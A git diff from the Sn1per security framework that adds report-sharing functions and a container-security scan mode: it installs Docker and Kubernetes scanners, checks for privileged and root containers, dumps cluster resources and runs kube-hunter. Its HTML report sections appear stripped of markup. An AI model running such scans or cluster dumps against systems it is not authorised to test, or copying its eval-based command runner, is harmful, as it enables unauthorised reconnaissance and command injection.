Function to generate comprehensive report +generate_comprehensive_report() { + echo "[*] Generating comprehensive team report..." + + REPORT_FILE="$SHARED_DIR/comprehensive-report-$TARGET.html" + + cat > "$REPORT_FILE" << HTML_EOF + + + + Sn1per Team Report - $TARGET + + + +
+

Sn1per Team Report - $TARGET

+

Generated: $(date)

+

Team Members: $(whoami)

+
+ +
+

Executive Summary

+

Target: $TARGET

+

Scan Status: $(ls $LOOT_DIR/scans/running_*.txt 2>/dev/null | wc -l) scans running

+

Total Findings: $(find $LOOT_DIR -name "*.txt" | wc -l) files generated

+
+ +
+

Critical Findings

+ $(grep -r "CRITICAL\|HIGH" $LOOT_DIR/vuln-analysis/ 2>/dev/null | head -10 | sed 's/.*/

&<\/p>/') +

+ +
+

AI Analysis Results

+ $(grep -A 5 "Threat Score:" $LOOT_DIR/ml-analysis/ai-analysis-report-$TARGET.txt 2>/dev/null | head -10 | sed 's/.*/

&<\/p>/') +

+ +
+

Collaboration Notes

+ $(tail -10 $LOOT_DIR/collaboration/team-chat/chat-history-$TARGET.log 2>/dev/null | sed 's/.*/

&<\/p>/') +

+ +
+

Recommendations

+
    +
  1. Review all critical findings immediately
    2. +
  2. Coordinate remediation efforts with team
    3. +
  3. Schedule follow-up scans as needed
    4. +
  4. Document all findings for compliance
    5. +
+
+ + +HTML_EOF + + echo "[+] Comprehensive report generated: $REPORT_FILE" +} + +# Function to share report via various methods +share_report() { + echo "[*] Sharing report..." + + # Generate report first + generate_comprehensive_report + + echo "Share options:" + echo "1. Copy to shared directory" + echo "2. Export to PDF (if wkhtmltopdf available)" + echo "3. Send via email (if configured)" + echo "4. Upload to collaboration platform" + + read -p "Choose sharing method: " method + + case \$method in + 1) + echo "[+] Report available in: $SHARED_DIR" + ;; + 2) + if command -v wkhtmltopdf &> /dev/null; then + wkhtmltopdf "$SHARED_DIR/comprehensive-report-$TARGET.html" "$SHARED_DIR/comprehensive-report-$TARGET.pdf" + echo "[+] PDF report generated: $SHARED_DIR/comprehensive-report-$TARGET.pdf" + else + echo "[-] wkhtmltopdf not available" + fi + ;; + 3) + echo "[*] Email sharing not configured in this demo" + ;; + 4) + echo "[*] Platform upload not configured in this demo" + ;; + *) + echo "[-] Invalid option" + ;; + esac +} + +# Function to create summary report +create_summary() { + echo "[*] Creating summary report..." + + SUMMARY_FILE="$SHARED_DIR/summary-$TARGET.txt" + + cat > "$SUMMARY_FILE" << SUMMARY_EOF +SN1PER TEAM SUMMARY REPORT - $TARGET +===================================== +Generated: $(date) +Team: $(whoami) + +KEY FINDINGS: +$(grep -r "CRITICAL\|HIGH" $LOOT_DIR/ 2>/dev/null | head -5) + +AI THREAT SCORE: +$(grep "Threat Score:" $LOOT_DIR/ml-analysis/ai-analysis-report-$TARGET.txt 2>/dev/null) + +ACTIVE COLLABORATION: +$(tail -3 $LOOT_DIR/collaboration/team-chat/chat-history-$TARGET.log 2>/dev/null) + +NEXT STEPS: +1. Review critical findings +2. Coordinate remediation +3. Plan follow-up actions + +SHARED FILES: +$(ls $SHARED_DIR/ | tr '\n' ' ') + +--- +Quick access to reports: +- Full report: $SHARED_DIR/comprehensive-report-$TARGET.html +- Vulnerability report: $SHARED_DIR/vulnerability-report-$TARGET.txt +- AI analysis: $SHARED_DIR/ai-analysis-report-$TARGET.txt +SUMMARY_EOF + + echo "[+] Summary created: $SUMMARY_FILE" +} + +# Main report sharing menu +while true; do + echo "" + echo "=== Report Sharing Center ===" + echo "1. Generate comprehensive report" + echo "2. Share report" + echo "3. Create summary report" + echo "4. Show shared files" + echo "5. Exit" + echo "" + + read -p "Choose option: " choice + + case \$choice in + 1) + generate_comprehensive_report + ;; + 2) + share_report + ;; + 3) + create_summary + ;; + 4) + echo "=== Shared Files ===" + ls -la "$SHARED_DIR/" 2>/dev/null + echo "===================" + ;; + 5) + echo "[*] Exiting report sharing..." + break + ;; + *) + echo "[-] Invalid option" + ;; + esac +done +EOF +chmod +x $LOOT_DIR/collaboration/report-sharing/report-share.sh + +# 6. GENERATE COLLABORATION REPORT +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED GENERATING COLLABORATION REPORT $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Compile comprehensive collaboration report +cat > $LOOT_DIR/collaboration/collaboration-report-$TARGET.txt << EOF +SNIPER SECURITY - REAL-TIME COLLABORATION REPORT +================================================= +Target: $TARGET +Scan Date: $(date) +Framework: Sn1per v$VER - Real-Time Collaboration Mode + +EXECUTIVE SUMMARY +================= +Collaboration System Status: ACTIVE +Team Chat System: $(if [[ -f "$LOOT_DIR/collaboration/team-chat/chat-server.sh" ]]; then echo "ENABLED"; else echo "DISABLED"; fi) +Shared Workspace: $(if [[ -f "$LOOT_DIR/collaboration/shared-workspace/workspace-share.sh" ]]; then echo "ENABLED"; else echo "DISABLED"; fi) +Progress Tracking: $(if [[ -f "$LOOT_DIR/collaboration/progress-tracking/progress-tracker.sh" ]]; then echo "ENABLED"; else echo "DISABLED"; fi) +Notification Center: $(if [[ -f "$LOOT_DIR/collaboration/notification-center/notification-system.sh" ]]; then echo "ENABLED"; else echo "DISABLED"; fi) +Report Sharing: $(if [[ -f "$LOOT_DIR/collaboration/report-sharing/report-share.sh" ]]; then echo "ENABLED"; else echo "DISABLED"; fi) + +TEAM CHAT SYSTEM +================ +Chat History File: $LOOT_DIR/collaboration/team-chat/chat-history-$TARGET.log +Active Users: $(wc -l $LOOT_DIR/collaboration/team-chat/active-users.txt 2>/dev/null || echo "0") +Chat Messages: $(wc -l $LOOT_DIR/collaboration/team-chat/chat-history-$TARGET.log 2>/dev/null || echo "0") + +SHARED WORKSPACE +================ +Shared Directory: $LOOT_DIR/shared/ +Shared Files: $(ls $LOOT_DIR/shared/ 2>/dev/null | wc -l) +Key Shared Reports: +$(ls $LOOT_DIR/shared/ | head -10 | sed 's/^/- /') + +PROGRESS TRACKING +================= +Progress File: $LOOT_DIR/collaboration/progress-tracking/scan-progress.json +Current Progress: $(grep "overall_progress" $LOOT_DIR/collaboration/progress-tracking/scan-progress.json 2>/dev/null | cut -d: -f2 | tr -d '"}') +Estimated Completion: $(grep "estimated_completion" $LOOT_DIR/collaboration/progress-tracking/scan-progress.json 2>/dev/null | cut -d'"' -f4) + +NOTIFICATION CENTER +================== +Notification Log: $LOOT_DIR/collaboration/notification-center/notifications.log +Total Notifications: $(wc -l $LOOT_DIR/collaboration/notification-center/notifications.log 2>/dev/null || echo "0") +Recent Notifications: +$(tail -5 $LOOT_DIR/collaboration/notification-center/notifications.log 2>/dev/null) + +REPORT SHARING +============== +Comprehensive Report: $LOOT_DIR/shared/comprehensive-report-$TARGET.html +Summary Report: $LOOT_DIR/shared/summary-$TARGET.txt +Available Reports: $(ls $LOOT_DIR/shared/ | wc -l) files + +COLLABORATION FEATURES +====================== +1. Real-time team chat with command interface +2. Shared workspace for file collaboration +3. Progress tracking with JSON-based status +4. Notification center with priority levels +5. Report sharing with HTML/PDF export +6. Slack integration for notifications +7. Team member activity tracking +8. Comprehensive collaboration logging + +USAGE INSTRUCTIONS +================== +1. Team Chat: Run $LOOT_DIR/collaboration/team-chat/chat-server.sh +2. Workspace Sharing: Run $LOOT_DIR/collaboration/shared-workspace/workspace-share.sh +3. Progress Tracking: Run $LOOT_DIR/collaboration/progress-tracking/progress-tracker.sh +4. Notifications: Run $LOOT_DIR/collaboration/notification-center/notification-system.sh +5. Report Sharing: Run $LOOT_DIR/collaboration/report-sharing/report-share.sh + +RECOMMENDATIONS +============== +1. Use team chat for real-time coordination +2. Share important findings via shared workspace +3. Track progress using the progress tracker +4. Set up notifications for critical findings +5. Generate and share reports regularly +6. Use Slack integration for remote teams +7. Document all team activities and decisions + +COLLABORATION METRICS +===================== +- Active Collaboration Tools: $(ls $LOOT_DIR/collaboration/ | wc -l) systems +- Team Communication: $(wc -l $LOOT_DIR/collaboration/team-chat/chat-history-$TARGET.log 2>/dev/null || echo "0") messages +- Shared Resources: $(ls $LOOT_DIR/shared/ 2>/dev/null | wc -l) files +- Progress Updates: $(grep -c "Progress update" $LOOT_DIR/collaboration/notification-center/notifications.log 2>/dev/null || echo "0") updates + +Generated by Sn1per Collaboration Framework +https://sn1persecurity.com +EOF + +echo -e "$OKGREEN[*]$RESET Real-time collaboration features completed for $TARGET" +echo -e "$OKGREEN[*]$RESET Collaboration systems activated: $(ls $LOOT_DIR/collaboration/ | wc -l) systems" +echo -e "$OKGREEN[*]$RESET Report saved to: $LOOT_DIR/collaboration/collaboration-report-$TARGET.txt" + +echo "[sn1persecurity.com] •?((¯°·._.• Completed Sn1per collaboration mode: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt +if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Completed Sn1per collaboration mode: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" +fi diff --git a/modes/container-security.sh b/modes/container-security.sh new file mode 100644 index 00000000..5dc2f9be --- /dev/null +++ b/modes/container-security.sh @@ -0,0 +1,1343 @@ +#!/bin/bash +# Container Security Scan Mode +# Author: Sn1per Security Team +# Description: Comprehensive container security scanning for Docker and Kubernetes +# Version: 1.0 + +# Set colors for output +RED="\033[01;31m" +GREEN="\033[01;32m" +YELLOW="\033[01;33m" +BLUE="\033[01;34m" +BOLD="\033[1m" +RESET="\033[00m" + +# Global variables +TARGET="" +OUTPUT_DIR="" +SCAN_TYPE="all" # all, docker, kubernetes, image +SCAN_DEPTH="standard" # quick, standard, deep +REPORT_FORMAT="html" # html, json, pdf +VERBOSE=false +DOCKER_IMAGES=() +KUBERNETES_CONTEXTS=() +SCAN_TIMESTAMP=$(date +"%Y%m%d_%H%M%S") +REPORT_FILE="" + +# Check if running as root +check_root() { + if [ "$(id -u)" -ne 0 ]; then + echo -e "${RED}[!]${RESET} This script must be run as root" + exit 1 + fi +} + +# Show banner +show_banner() { + echo -e "${BLUE}" + echo " ██████╗ ██████╗ ███╗ ██╗████████╗ █████╗ ██╗███╗ ██╗███████╗██████╗ " + echo " ██╔════╝██╔═══██╗████╗ ██║╚══██╔══╝██╔══██╗██║████╗ ██║██╔════╝╚════██╗" + echo " ██║ ██║ ██║██╔██╗ ██║ ██║ ███████║██║██╔██╗ ██║█████╗ █████╔╝" + echo " ██║ ██║ ██║██║╚██╗██║ ██║ ██╔══██║██║██║╚██╗██║██╔══╝ ╚═══██╗" + echo " ╚██████╗╚██████╔╝██║ ╚████║ ██║ ██║ ██║██║██║ ╚████║███████╗██████╔╝" + echo " ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═════╝ " + echo -e "${RESET}" + echo -e "${BOLD}Container Security Scanner - Part of Sn1per Pro${RESET}" + echo -e "Version 1.0 | https://sn1persecurity.com" + echo -e "${BLUE}------------------------------------------------${RESET}" +} + +# Check for required tools +check_dependencies() { + local missing_deps=() + + # Core tools + local core_tools=("docker" "jq" "curl" "trivy" "kubectl" "kube-bench" "kube-hunter" "dockle" "clair" "anchore-cli") + + for tool in "${core_tools[@]}"; do + if ! command -v "$tool" &> /dev/null; then + missing_deps+=("$tool") + echo -e "${YELLOW}[!]${RESET} $tool is not installed" + fi + done + + # Check for Docker + if ! systemctl is-active --quiet docker 2>/dev/null; then + echo -e "${YELLOW}[!]${RESET} Docker service is not running" + echo -e "${BLUE}[*]${RESET} Attempting to start Docker service..." + if command -v systemctl &> /dev/null; then + systemctl start docker + elif command -v service &> /dev/null; then + service docker start + fi + + if ! systemctl is-active --quiet docker 2>/dev/null; then + echo -e "${RED}[!]${RESET} Failed to start Docker service. Please install and start Docker manually." + exit 1 + fi + fi + + # Check for Kubernetes tools if k8s scan is requested + if [[ "$SCAN_TYPE" == "kubernetes" || "$SCAN_TYPE" == "all" ]]; then + if ! command -v kubectl &> /dev/null; then + echo -e "${YELLOW}[!]${RESET} kubectl is not installed. Some Kubernetes scans will be skipped." + fi + + if ! command -v kube-bench &> /dev/null; then + echo -e "${YELLOW}[!]${RESET} kube-bench is not installed. CIS benchmark checks will be skipped." + fi + + if ! command -v kube-hunter &> /dev/null; then + echo -e "${YELLOW}[!]${RESET} kube-hunter is not installed. Kubernetes penetration testing will be skipped." + fi + fi + + # Offer to install missing dependencies + if [ ${#missing_deps[@]} -gt 0 ]; then + echo -e "\n${YELLOW}[!] Missing dependencies detected.${RESET}" + read -p "Do you want to install missing dependencies? [y/N] " -n 1 -r + echo + if [[ $REPLY =~ ^[Yy]$ ]]; then + install_dependencies "${missing_deps[@]}" + else + echo -e "${YELLOW}[!] Some features may not work without all dependencies.${RESET}" + fi + fi +} + +# Install missing dependencies +install_dependencies() { + echo -e "${BLUE}[*]${RESET} Installing missing dependencies..." + + if command -v apt-get &> /dev/null; then + # Debian/Ubuntu + apt-get update + for dep in "$@"; do + case $dep in + docker) + echo -e "${BLUE}[*]${RESET} Installing Docker..." + apt-get install -y docker.io + systemctl enable --now docker + ;; + trivy) + echo -e "${BLUE}[*]${RESET} Installing Trivy..." + apt-get install -y wget apt-transport-https gnupg lsb-release + wget -qO - https://aquasecurity.github.io/trivy-repo/deb/public.key | apt-key add - + echo deb https://aquasecurity.github.io/trivy-repo/deb $(lsb_release -sc) main | tee -a /etc/apt/sources.list.d/trivy.list + apt-get update + apt-get install -y trivy + ;; + kubectl) + echo -e "${BLUE}[*]${RESET} Installing kubectl..." + curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" + install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl + ;; + kube-bench) + echo -e "${BLUE}[*]${RESET} Installing kube-bench..." + curl -L https://github.com/aquasecurity/kube-bench/releases/latest/download/kube-bench_0.6.9_linux_amd64.deb -o kube-bench.deb + apt-get install -y ./kube-bench.deb + rm kube-bench.deb + ;; + kube-hunter) + echo -e "${BLUE}[*]${RESET} Installing kube-hunter..." + pip3 install kube-hunter + ;; + dockle) + echo -e "${BLUE}[*]${RESET} Installing Dockle..." + VERSION=$( + curl -s https://api.github.com/repos/goodwithtech/dockle/releases/latest | \ + grep tag_name | \ + cut -d '"' -f 4 | \ + sed 's/v//g' + ) + wget -q -O dockle.deb "https://github.com/goodwithtech/dockle/releases/download/v${VERSION}/dockle_${VERSION}_Linux-64bit.deb" + dpkg -i dockle.deb + rm dockle.deb + ;; + anchore-cli) + echo -e "${BLUE}[*]${RESET} Installing anchore-cli..." + pip3 install anchorecli + ;; + *) + apt-get install -y "$dep" + ;; + esac + done + elif command -v yum &> /dev/null; then + # RHEL/CentOS + yum install -y epel-release + for dep in "$@"; do + case $dep in + docker) + echo -e "${BLUE}[*]${RESET} Installing Docker..." + yum install -y yum-utils + yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo + yum install -y docker-ce docker-ce-cli containerd.io + systemctl enable --now docker + ;; + trivy) + echo -e "${BLUE}[*]${RESET} Installing Trivy..." + yum install -y wget + wget -O /etc/yum.repos.d/aquasec-trivy.repo https://aquasecurity.github.io/trivy-repo/rpm/aquasec-trivy.repo + yum -y update + yum -y install trivy + ;; + kubectl) + echo -e "${BLUE}[*]${RESET} Installing kubectl..." + cat < /etc/yum.repos.d/kubernetes.repo +[kubernetes] +name=Kubernetes +baseurl=https://packages.cloud.google.com/yum/repos/kubernetes-el7-x86_64 +enabled=1 +gpgcheck=1 +repo_gpgcheck=1 +gpgkey=https://packages.cloud.google.com/yum/doc/yum-key.gpg https://packages.cloud.google.com/yum/doc/rpm-package-key.gpg +EOF + yum install -y kubectl + ;; + *) + yum install -y "$dep" + ;; + esac + done + else + echo -e "${RED}[!]${RESET} Unsupported package manager. Please install the following tools manually:" + printf "- %s\n" "$@" + return 1 + fi + + echo -e "${GREEN}[+]${RESET} Dependencies installed successfully!" +} + +# Parse command line arguments +parse_arguments() { + while [[ $# -gt 0 ]]; do + case $1 in + -t|--target) + TARGET="$2" + shift 2 + ;; + -o|--output) + OUTPUT_DIR="$2" + shift 2 + ;; + --type) + SCAN_TYPE="${2,,}" + shift 2 + ;; + --depth) + SCAN_DEPTH="${2,,}" + shift 2 + ;; + --format) + REPORT_FORMAT="${2,,}" + shift 2 + ;; + -v|--verbose) + VERBOSE=true + shift + ;; + -h|--help) + show_help + exit 0 + ;; + *) + echo -e "${RED}[!]${RESET} Unknown option: $1" + show_help + exit 1 + ;; + esac + done + + # Validate scan type + if [[ "$SCAN_TYPE" != "all" && "$SCAN_TYPE" != "docker" && "$SCAN_TYPE" != "kubernetes" && "$SCAN_TYPE" != "image" ]]; then + echo -e "${RED}[!]${RESET} Invalid scan type. Must be one of: all, docker, kubernetes, image" + exit 1 + fi + + # Validate scan depth + if [[ "$SCAN_DEPTH" != "quick" && "$SCAN_DEPTH" != "standard" && "$SCAN_DEPTH" != "deep" ]]; then + echo -e "${YELLOW}[!]${RESET} Invalid scan depth. Defaulting to 'standard'" + SCAN_DEPTH="standard" + fi + + # Validate report format + if [[ "$REPORT_FORMAT" != "html" && "$REPORT_FORMAT" != "json" && "$REPORT_FORMAT" != "pdf" ]]; then + echo -e "${YELLOW}[!]${RESET} Invalid report format. Defaulting to 'html'" + REPORT_FORMAT="html" + fi + + # Set default output directory if not specified + if [ -z "$OUTPUT_DIR" ]; then + OUTPUT_DIR="$(pwd)/container_scan_${SCAN_TIMESTAMP}" + fi + + # Create output directory + mkdir -p "$OUTPUT_DIR" + + # Set report file path + REPORT_FILE="${OUTPUT_DIR}/container_security_report_${SCAN_TIMESTAMP}.${REPORT_FORMAT}" +} + +# Show help message +show_help() { + echo -e "${BOLD}Container Security Scanner - Usage:${RESET}" + echo " ./container-security.sh [options]" + echo + echo "Options:" + echo " -t, --target TARGET Target to scan (Docker image, Kubernetes namespace, or host)" + echo " -o, --output DIR Output directory for scan results (default: ./container_scan_TIMESTAMP)" + echo " --type TYPE Type of scan: all, docker, kubernetes, image (default: all)" + echo " --depth DEPTH Scan depth: quick, standard, deep (default: standard)" + echo " --format FORMAT Report format: html, json, pdf (default: html)" + echo " -v, --verbose Enable verbose output" + echo " -h, --help Show this help message" + echo + echo "Examples:" + echo " # Scan all container-related components on the host" + echo " ./container-security.sh --type all --depth standard" + echo + echo " # Scan a specific Docker image" + echo " ./container-security.sh --type image --target nginx:latest" + echo + echo " # Scan a Kubernetes namespace" + echo " ./container-security.sh --type kubernetes --target my-namespace" + echo + echo " # Run a deep scan with PDF report" + echo " ./container-security.sh --type all --depth deep --format pdf" +} + +# Check if a command exists +command_exists() { + command -v "$1" &> /dev/null +} + +# Log messages with different log levels +log() { + local level="$1" + local message="$2" + local timestamp + timestamp=$(date '+%Y-%m-%d %H:%M:%S') + + case "$level" in + "INFO") + echo -e "${BLUE}[*]${RESET} [${timestamp}] ${message}" + ;; + "SUCCESS") + echo -e "${GREEN}[+]${RESET} [${timestamp}] ${message}" + ;; + "WARNING") + echo -e "${YELLOW}[!]${RESET} [${timestamp}] WARNING: ${message}" + ;; + "ERROR") + echo -e "${RED}[-]${RESET} [${timestamp}] ERROR: ${message}" >&2 + ;; + *) + echo -e "[${timestamp}] ${message}" + ;; + esac + + # Log to file if verbose mode is enabled + if [ "$VERBOSE" = true ]; then + echo "[${timestamp}] [${level}] ${message}" >> "${OUTPUT_DIR}/container_scan_${SCAN_TIMESTAMP}.log" + fi +} + +# Run a command and log the output +run_command() { + local cmd="$1" + local log_file="$2" + local append_log=true + + # If log_file is not provided, use a temporary file + if [ -z "$log_file" ]; then + log_file=$(mktemp) + append_log=false + fi + + log "INFO" "Running: ${cmd}" + + if [ "$VERBOSE" = true ]; then + eval "${cmd}" 2>&1 | tee -a "${log_file}" + local exit_code=${PIPESTATUS[0]} + else + eval "${cmd}" >> "${log_file}" 2>&1 + local exit_code=$? + fi + + if [ $exit_code -ne 0 ]; then + log "ERROR" "Command failed with exit code ${exit_code}: ${cmd}" + if [ "$VERBOSE" = false ]; then + log "INFO" "Command output (last 10 lines):" + tail -n 10 "${log_file}" + fi + fi + + # If we created a temporary file, remove it + if [ "$append_log" = false ]; then + cat "${log_file}" >> "${OUTPUT_DIR}/container_scan_${SCAN_TIMESTAMP}.log" + rm -f "${log_file}" + fi + + return $exit_code +} + +# Scan Docker images for vulnerabilities +scan_docker_images() { + local output_file="${OUTPUT_DIR}/docker_image_scan_${SCAN_TIMESTAMP}.json" + + log "INFO" "Scanning Docker images for vulnerabilities..." + + # Get list of all Docker images + if [ "${#DOCKER_IMAGES[@]}" -eq 0 ]; then + log "INFO" "No specific images provided, scanning all local Docker images" + mapfile -t DOCKER_IMAGES < <(docker images --format "{{.Repository}}:{{.Tag}}" | grep -v "") + fi + + if [ ${#DOCKER_IMAGES[@]} -eq 0 ]; then + log "WARNING" "No Docker images found to scan" + return 1 + fi + + # Create results array + local results=() + + # Scan each image + for image in "${DOCKER_IMAGES[@]}"; do + log "INFO" "Scanning Docker image: ${image}" + + # Skip if image is empty + if [ -z "$image" ]; then + continue + fi + + local scan_result + local scan_cmd + + # Use Trivy for vulnerability scanning + if command_exists trivy; then + log "INFO" "Running Trivy scan on ${image}" + scan_cmd="trivy image --security-checks vuln,config,secret --ignore-unfixed --format json -o ${OUTPUT_DIR}/trivy_$(echo "$image" | tr '/:' '_').json ${image}" + run_command "$scan_cmd" + + # Convert Trivy output to our format + local trivy_file="${OUTPUT_DIR}/trivy_$(echo "$image" | tr '/:' '_').json" + if [ -f "$trivy_file" ]; then + local vuln_count + vuln_count=$(jq '.Results[].Vulnerabilities | length' "$trivy_file" | awk '{sum += $1} END {print sum}') + results+=("{\"image\":\"${image}\",\"scanner\":\"trivy\",\"vulnerabilities\":${vuln_count:-0}}") + fi + fi + + # Use Dockle for best practices checking + if command_exists dockle; then + log "INFO" "Running Dockle scan on ${image}" + scan_cmd="dockle --exit-code 0 --format json --output ${OUTPUT_DIR}/dockle_$(echo "$image" | tr '/:' '_').json ${image}" + run_command "$scan_cmd" + fi + done + + # Save combined results + echo "[$(IFS=,; echo "${results[*]}")]" > "$output_file" + + log "SUCCESS" "Docker image scanning completed. Results saved to ${output_file}" +} + +# Scan Docker daemon and host configuration +scan_docker_daemon() { + log "INFO" "Scanning Docker daemon and host configuration..." + + local output_file="${OUTPUT_DIR}/docker_daemon_scan_${SCAN_TIMESTAMP}.txt" + + # Check Docker version + run_command "docker version" "${output_file}" + + # Check Docker info + run_command "docker info" "${output_file}" + + # Check Docker system-wide information + run_command "docker system info" "${output_file}" + + # Check for common misconfigurations + log "INFO" "Checking for common Docker misconfigurations..." + + # Check if Docker daemon is running with TLS + if pgrep -f "dockerd.*--tlsverify" >/dev/null; then + log "SUCCESS" "Docker daemon is running with TLS authentication" + else + log "WARNING" "Docker daemon is not using TLS authentication" + fi + + # Check if Docker socket is protected + local docker_sock_perms + docker_sock_perms=$(stat -c "%a" /var/run/docker.sock 2>/dev/null || echo "0") + if [ "$docker_sock_perms" -gt 660 ]; then + log "WARNING" "Docker socket has overly permissive permissions (${docker_sock_perms}). Consider setting to 660 or more restrictive." + fi + + # Check for privileged containers + local privileged_containers + privileged_containers=$(docker ps --quiet --filter "status=running" --filter "privileged=true" | wc -l) + if [ "$privileged_containers" -gt 0 ]; then + log "WARNING" "Found ${privileged_containers} privileged containers. Privileged containers have full access to the host system." + fi + + # Check for containers running as root + local root_containers + root_containers=$(docker ps --quiet --filter "status=running" --format '{{.ID}} {{.Names}} {{.Image}}' | \ + while read -r id name image; do + local user + user=$(docker inspect --format '{{.Config.User}}' "$id" 2>/dev/null || echo "root") + if [ -z "$user" ] || [ "$user" = "root" ]; then + echo "Container: $name, Image: $image, User: ${user:-root}" + fi + done | wc -l) + if [ "$root_containers" -gt 0 ]; then + log "WARNING" "Found ${root_containers} containers running as root. Consider using non-root users in containers." + fi + + # Check for exposed Docker socket in containers + local exposed_sock_containers + exposed_sock_containers=$(docker ps --quiet --filter "status=running" --format '{{.ID}}' | \ + while read -r id; do + if docker inspect --format '{{range .Mounts}}{{if eq .Destination "/var/run/docker.sock"}}{{.Source}}{{end}}{{end}}' "$id" | grep -q "docker.sock"; then + docker inspect --format '{{.Name}}' "$id" | sed 's|^/||' + fi + done | wc -l) + if [ "$exposed_sock_containers" -gt 0 ]; then + log "WARNING" "Found ${exposed_sock_containers} containers with Docker socket mounted. This can be a security risk." + fi + + log "SUCCESS" "Docker daemon scan completed. Results saved to ${output_file}" +} + +# Scan Kubernetes cluster +scan_kubernetes() { + log "INFO" "Scanning Kubernetes cluster..." + + # Check if kubectl is installed + if ! command_exists kubectl; then + log "ERROR" "kubectl is not installed. Skipping Kubernetes scan." + return 1 + fi + + # Check if we can connect to a Kubernetes cluster + if ! kubectl cluster-info &>/dev/null; then + log "ERROR" "Unable to connect to a Kubernetes cluster. Please ensure kubeconfig is properly configured." + return 1 + fi + + local output_dir="${OUTPUT_DIR}/kubernetes_scan_${SCAN_TIMESTAMP}" + mkdir -p "$output_dir" + + # Get cluster info + log "INFO" "Gathering Kubernetes cluster information..." + run_command "kubectl cluster-info dump" "${output_dir}/cluster_info_dump.yaml" + + # Get nodes + run_command "kubectl get nodes -o wide" "${output_dir}/nodes.txt" + + # Get all namespaces + run_command "kubectl get namespaces" "${output_dir}/namespaces.txt" + + # Get all resources in all namespaces + for ns in $(kubectl get namespaces -o jsonpath='{.items[*].metadata.name}'); do + log "INFO" "Scanning namespace: ${ns}" + mkdir -p "${output_dir}/namespaces/${ns}" + + # Get all resources in the namespace + for resource in $(kubectl api-resources --namespaced=true --verbs=list -o name); do + local safe_resource + safe_resource=$(echo "$resource" | sed 's|/|_|g') + run_command "kubectl get $resource -n $ns -o wide" "${output_dir}/namespaces/${ns}/${safe_resource}.txt" 2>/dev/null + run_command "kubectl get $resource -n $ns -o yaml" "${output_dir}/namespaces/${ns}/${safe_resource}.yaml" 2>/dev/null + done + + # Get pod security context + for pod in $(kubectl get pods -n "$ns" -o jsonpath='{.items[*].metadata.name}'); do + mkdir -p "${output_dir}/namespaces/${ns}/pods/${pod}" + run_command "kubectl get pod "$pod" -n "$ns" -o yaml" "${output_dir}/namespaces/${ns}/pods/${pod}/pod.yaml" + run_command "kubectl describe pod "$pod" -n "$ns"" "${output_dir}/namespaces/${ns}/pods/${pod}/describe.txt" + + # Check security context + local security_context + security_context=$(kubectl get pod "$pod" -n "$ns" -o jsonpath='{.spec.securityContext}' 2>/dev/null || echo "{}") + echo "$security_context" > "${output_dir}/namespaces/${ns}/pods/${pod}/security_context.json" + + # Check container security contexts + for container in $(kubectl get pod "$pod" -n "$ns" -o jsonpath='{.spec.containers[*].name}'); do + local container_ctx + container_ctx=$(kubectl get pod "$pod" -n "$ns" -o jsonpath='{.spec.containers[?(@.name=="'$container'")].securityContext}' 2>/dev/null || echo "{}") + echo "$container_ctx" > "${output_dir}/namespaces/${ns}/pods/${pod}/container_${container}_security_context.json" + + # Check for privileged mode + if echo "$container_ctx" | grep -q '"privileged"\s*:\s*true'; then + log "WARNING" "Pod ${pod} in namespace ${ns} has container ${container} running in privileged mode!" + fi + + # Check for root user + local run_as_user + run_as_user=$(echo "$container_ctx" | grep -o '"runAsUser"\s*:\s*[0-9]*' | cut -d ':' -f 2 | tr -d ' ' || echo "") + if [ -z "$run_as_user" ] || [ "$run_as_user" -eq 0 ]; then + log "WARNING" "Pod ${pod} in namespace ${ns} has container ${container} running as root (runAsUser: ${run_as_user:-0})" + fi + done + done + done + + # Run kube-bench if available + if command_exists kube-bench; then + log "INFO" "Running kube-bench for CIS benchmark checks..." + run_command "kube-bench --json" "${output_dir}/kube_bench_results.json" + fi + + # Run kube-hunter if available and in server mode + if command_exists kube-hunter; then + log "INFO" "Running kube-hunter for penetration testing..." + run_command "kube-hunter --report json --log-file ${output_dir}/kube_hunter_results.json" + fi + + log "SUCCESS" "Kubernetes scan completed. Results saved to ${output_dir}" +} + +# Scan container registries +scan_registries() { + log "INFO" "Scanning container registries..." + + # This is a placeholder for registry scanning functionality + # In a real implementation, this would connect to various registries and scan images + + log "WARNING" "Registry scanning is not yet implemented in this version" +} + +# Generate HTML report +generate_html_report() { + local output_file="${OUTPUT_DIR}/container_security_report_${SCAN_TIMESTAMP}.html" + + log "INFO" "Generating HTML report..." + + # Start HTML document + cat > "$output_file" << EOL + + + + + + Container Security Scan Report + + + + +
+

Container Security Scan Report

+

Generated on: $(date)

+
+ +
+

Scan Summary

+
+
+

Critical

+
0
+

Critical severity findings

+
+
+

High

+
0
+

High severity findings

+
+
+

Medium

+
0
+

Medium severity findings

+
+
+

Low

+
0
+

Low severity findings

+
+
+

Info

+
0
+

Informational findings

+
+
+ +
+ +
+
+ +
+

Scan Details

+ +
+ + + + +
+ +
+

Security Findings

+
+ +

No security findings to display.

+
+
+ +
+

Scanned Images

+ + + + + + + + + + + + + + + + + +
ImageCriticalHighMediumLowInfo
No image data available.
+
+ +
+

Kubernetes Security

+
+ +

No Kubernetes security data available.

+
+
+ +
+

Security Recommendations

+
+ +

No recommendations available.

+
+
+
+ +
+

Scan Information

+ + + + + + + + + + + + + + + + + + + + + +
Scan Type:${SCAN_TYPE}
Scan Depth:${SCAN_DEPTH}
Target:${TARGET:-All local containers and images}
Scan Duration:N/A
Report Generated:$(date)
+
+ +
+

Report generated by Sn1per Pro Container Security Scanner

+

© $(date +%Y) Sn1per Security Team | https://sn1persecurity.com

+
